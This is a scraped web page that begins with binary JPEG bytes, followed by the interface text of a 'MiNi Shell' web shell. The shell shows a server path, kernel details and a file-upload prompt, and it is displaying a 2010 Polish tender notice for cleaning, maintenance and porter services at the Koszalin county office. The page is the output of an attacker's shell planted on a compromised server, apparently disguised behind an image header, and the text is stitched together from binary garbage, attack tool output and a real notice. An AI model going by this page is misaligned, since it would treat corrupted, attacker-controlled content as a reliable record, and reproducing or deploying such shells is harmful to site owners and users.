JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101202/345333-N-2010.html

<p class="kh_header"><b>Koszalin: USŁUGI  SPRZĄTANIA, KONSERWACJI I PORTIERSKIE
ŚWIADCZONE DLA STAROSTWA POWIATOWEGO W KOSZALINIE 
w okresie od 01.01.2011r. do 31.12.2011r.</b><br>
<b>Numer ogłoszenia: 345333 - 2010; data zamieszczenia: 02.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Koszalinie , ul. Racławicka 13, 75-620 Koszalin, woj. zachodniopomorskie, tel. 094 3428489, faks 094 3462261.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.koszalin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI  SPRZĄTANIA, KONSERWACJI I PORTIERSKIE
ŚWIADCZONE DLA STAROSTWA POWIATOWEGO W KOSZALINIE 
w okresie od 01.01.2011r. do 31.12.2011r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. OPIS PRZEDMIOTU ZAMÓWIENIA
1. Przedmiot zamówienia obejmuje:  Usługi sprzątania, konserwacji i portierskie świadczone dla Starostwa Powiatowego w Koszalinie w okresie  od  01.01.2011r. do  31.12.2011r., w tym w szczególności świadczenie usług w zakresie:

1.1. Sprzątania  i  utrzymania  czystości   pomieszczeń  biurowych  i  użytkowych,  korytarzy, holi, klatek schodowych, windy, sanitariatów, pochylni i innych  powierzchni  w budynku Starostwa Powiatowego w Koszalinie przy ulicy Racławickiej 13, 
-ogółem  2.790,22 m2 powierzchni. 

1.2. Sprzątania oraz utrzymania porządku i estetyki, łącznie z utrzymaniem w okresie zimowym całego terenu w obrębie nieruchomości Starostwa przy ulicy Racławickiej 13, w  skład  której wchodzą tereny  następujących  działek :
a)działka  ozn. nr 48/2  o  powierzchni  -  3.983,24 m2,  w tym: 
-tereny pod zabudową   804,19 m2,
-tereny obejmujące parkingi, jezdnie asfaltowe, parkingi utwardzone, chodniki i place o nawierzchni  betonowej   -   razem   powierzchnia   2.804,20 m2 ,
-tereny zieleni  (trawników) - 374,85 m2, 
Teren  działki w części ogrodzony.   
b)działka nr 128/14  o powierzchni 1.250,00 m2, w tym:
-teren o powierzchni 650,00 m2, zabudowany jezdnią, parkingiem, wjazdami na parking od strony działki nr 48/2 oraz dojściami i schodami  o nawierzchni betonowej (całość o nawierzchni betonowej pełnej i ażurowej),
-tereny  zieleni (trawniki) o powierzchni 450,00 m2,
-tereny zieleni z nasadzeniami krzewów 150,00 m2 (wymagana pielęgnacja nasadzeń).
Ogółem  całkowita powierzchnia  nieruchomości Starostwa dla pkt. 1.2. - 5.233,24 m2. 

1.3. Konserwacji  i  bieżącego  utrzymania  budynków, budowli  i  innych obiektów położonych na nieruchomości Starostwa  przy ulicy Racławickiej 13.     
Ogółem 3.884,98 m2 powierzchni użytkowej  budynku  administracyjnego.
Dodatkowo doraźne czynności naprawcze w zakresie określonym w pkt. 4 zał. Nr 2 do SIWZ.

1.4. usług portierskich:
 - dozór fizyczny od godziny 6-ej  do godziny 20-ej w zakresie  jak  w  zał. Nr 2 do SIWZ, obejmujący w szczególności: budynek administracyjny Starostwa,  teren nieruchomości przy ulicy Racławickiej 13.    
       
Inne usługi wchodzące w zakres przedmiotu zamówienia:
1.5. Doraźne wykonywanie prac transportu wewnętrznego w ramach pomieszczeń Starostwa, polegającego  w szczególności na przenoszeniu lub przemieszczaniu mebli, sprzętu biurowego i innego  wyposażenia (średnio do 20 roboczogodzin/miesiąc);
1.6.  Monitorowanie pracy odwadniających urządzeń zlokalizowanych przy budynku Starostwa obok trafostacji, a w przypadku nieprzewidzianej  przerwy w ich pracy lub  awarii doraźne usuwanie skutków ewentualnego zalania terenu poprzez wypompowywanie wody z użyciem sprzętu (pompy spalinowej udostępnionej przez Zamawiającego) -  niezależnie od pory roku lub dnia  jego  wystąpienia;
1.7. Usuwanie w obiekcie Starostwa oraz obrębie nieruchomości przy ul. Racławickiej 13, skutków awarii lub innych  zagrożeń niezależnie od pory  wystąpienia (z wyłączeniem  przypadków wymagających zaangażowania firm specjalistycznych);
1.8. Wykonywanie  prac  konserwacyjno - malarskich (z materiałów Zamawiającego) polegających na odnowieniu  powłok  malarskich  ścian  i  sufitów w  pokojach  lub  pomieszczeniach,  przyjmuje się odnowienie średnio 1 pokoju w miesiącu lub średnio do ok.50,00  m2  powłoki  miesięcznie. Okres rozliczeniowy dla tych usług - termin obowiązywania umowy.  
1.9.  Sprzątanie  pomieszczeń  i  powierzchni  w  trakcie  i  po   remontach (innych niż opisane   w pkt 1.8) wykonywanych  w budynku Starostwa Powiatowego.  W czasie  obowiązywania  umowy  zakłada się sprzątanie  ok. 200 m2  tych  powierzchni;      
1.10. Dyspozycyjność Wykonawcy w  zakresie  wykonywania  czynności sprzątania,  konserwacji i prowadzenia portierni, w dniach wolnych od pracy, dniach  świątecznych  oraz  sporadycznie  po godzinach pracy Starostwa, w przypadku organizowanych narad, sesji Rady Powiatu,  okolicznościowych imprez lub wystąpienia innych przypadków (przyjmuje się wystąpienie tych usług średnio do 2 dni w miesiącu);
1.11. Dodatkowe  wymogi  dotyczące  utrzymania  czystości  i  higieny oraz  dezynfekcji  pomieszczeń Powiatowego Zespołu  ds.  Orzekania o Niepełnosprawności  w zakresie szczegółowo  opisanym  w  pkt. 16  załącznika  Nr 2 do SIWZ;
1.12. Świadczenie doraźnych usług w zakresie konserwacji i bieżących napraw wewnętrznej instalacji elektrycznej w budynku Starostwa Powiatowego przy ul. Racławickiej   13 /wymagane posiadanie uprawnień elektrycznych do 1 kV/. Do kalkulacji należy przyjąć 100 roboczogodzin w okresie obowiązywania umowy.


Szczegółowy opis przedmiotu zamówienia znajduje się  w  SIWZ i załącznikach do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających polegających na powtórzeniu usług  stanowiących przedmiot zamówienia, stanowiących nie więcej niż 50% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4, 90.91.40.00-7, 98.34.11.20-2, 77.31.41.00-5, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 4000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się /wykaz na lub wg załącznika nr 7 do SIWZ/ doświadczeniem o charakterze i złożoności porównywalnej z zakresem usług będących przedmiotem niniejszego zamówienia - tzn. wykazać że w okresie ostatnich 3 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali lub wykonują co najmniej 1 (jedno) zamówienie polegające na świadczeniu usługw zakresie zgodnym z rozdziałem I pkt. III podpkt. 1.1:1.4 SIWZ, tj. w szczególności:
- usługi sprzątania i utrzymania czystości budynku/ów użyteczności publicznej - obejmujące powierzchnię  minimum   1.000 m2;
- usługi sprzątania, utrzymania porządku      i estetyki terenu - obejmujące powierzchnię  minimum  500 m2;
- usługi konserwacji i bieżącego utrzymania budynku/ów użyteczności publicznej - obejmujące powierzchnię  minimum  500 m2;
- usługi portierskie w budynku/ach użyteczności publicznej - obejmujące powierzchnię  minimum  1.000 m2;
realizowanych przez okres co najmniej 1 roku  i przedłożą dokument/y/ potwierdzający/e/, że zamówienie zostało zrealizowane (bądź jest realizowane) należycie. 

Za spełnienie warunku Zamawiający również uzna wykonanie oddzielnych zamówień, spełniających wymagania Zamawiającego, dla każdego z w/w zakresów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca dysponował do wykonania zamówienia następującymi osobami :
- do wykonania prac określonych w rozdziale I pkt III podpkt   1.1 - minimum 5 osób;
- do wykonania prac określonych w rozdziale I pkt III podpkt   1.2; 1.3; 1.4 - minimum 2 osoby.
Wykonawca musi złożyć wykaz osób sporządzony na lub wg zał. nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>WYPEŁNIONY FORMULARZ  OFERTOWY, DOWÓD WNIESIENIA WADIUM, PEŁNOMOCNICTWO /jeżeli występuje/</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę wysokości wynagrodzenia Wykonawcy jedynie w przypadku ustawowej zmiany stawki podatku VAT dla usług stanowiących przedmiot umowy, co nie będzie wymagało pisemnego aneksu do zawartej umowy z uwagi na zapisy zawarte w umowie regulujące tą kwestię.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.koszalin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> STAROSTWO POWIATOWE W KOSZALINIE
Ul. Racławicka 13, 75-620 Koszalin pok. 301-302 /III piętro/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2010 godzina 14:00, miejsce: STAROSTWO POWIATOWE W KOSZALINIE
Ul. Racławicka 13, 75-620 Koszalin pok. 301-302 /III piętro/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com